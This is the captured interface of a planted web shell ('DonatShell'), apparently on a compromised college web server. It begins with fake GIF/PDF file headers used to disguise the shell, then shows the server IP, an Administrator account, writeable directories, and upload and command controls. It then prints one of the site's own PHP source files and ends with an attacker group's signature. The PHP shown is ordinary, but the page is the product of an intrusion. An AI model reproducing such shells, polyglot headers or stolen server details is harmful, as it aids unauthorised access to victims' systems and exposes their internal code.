GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 134.29.175.74  /  Your IP : 216.73.216.160
Web Server : nginx/1.10.2
System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586
User : Administrator ( 0)
PHP Version : 7.1.0
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/nginx/html/Admin/Advising/ParseClasses/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : C:/nginx/html/Admin/Advising/ParseClasses//Parse.phpinc
<?
// Admin/Advising/ParseClasses/Parse.phpinc
#d_On();

$showParsing = false;

if (dc()) { echo basename(__FILE__)," line ",__LINE__,": ","<b>".__FILE__."</b><br>\n"; }

?>
<div class="center p attention" id="div_Parsing">Parsing classes. Please wait ...</div>
<?

include('Admin/Advising/ParseClasses/parse/parse_functions.phpinc');

$mnscucatURL = "http://legacy.ridgewater.edu/mnscucat/";

$html = file_get_contents($mnscucatURL); // Get mnscucat html.
$lines = explode("\n",str_replace('<br>',"\n",$html)); // Explode by newline and <br>/
$lnCount = count($lines); // Save line count.
d_Var('count($lines)',count($lines));
d_Var('$lines',$lines);
include('Admin/Advising/ParseClasses/parse/parse_mnscucat.phpinc'); // Get file info for the semester.
d_Var('$FILES',$FILES,'');

#$days = array();

$trackCOU_ID = false;//'000725';
$PCLASS = array();

/**/
foreach ( $FILES as $thisFile ) { // loop thru matching files.
	require('Admin/Advising/ParseClasses/parse/parse.phpinc');
	#d_On(); d_Line('','l/'); d_Off();
	#break;
} // loop thru matching files.
/**/

if ( $showParsing ) {
?>
	<div style="border:1px solid black;">
<?
	d_On(); d_Var('$PCLASS',$PCLASS,'lk/+'); d_Off();
?>
	</div>
<?
}
require('Admin/Advising/ParseClasses/UpdateClasses.phpinc');

?>
<script type="text/javascript">
document.getElementById('div_Parsing').innerHTML = 'Done.';
</script>
<?
/** /
sort($days);
?>
$days ==
<pre>
<?
foreach ( $days as $day ) {
	echo '['.$day.']<br>';
}
?>
</pre>
<?
/**/
?>

Anon7 - 2022
AnonSec Team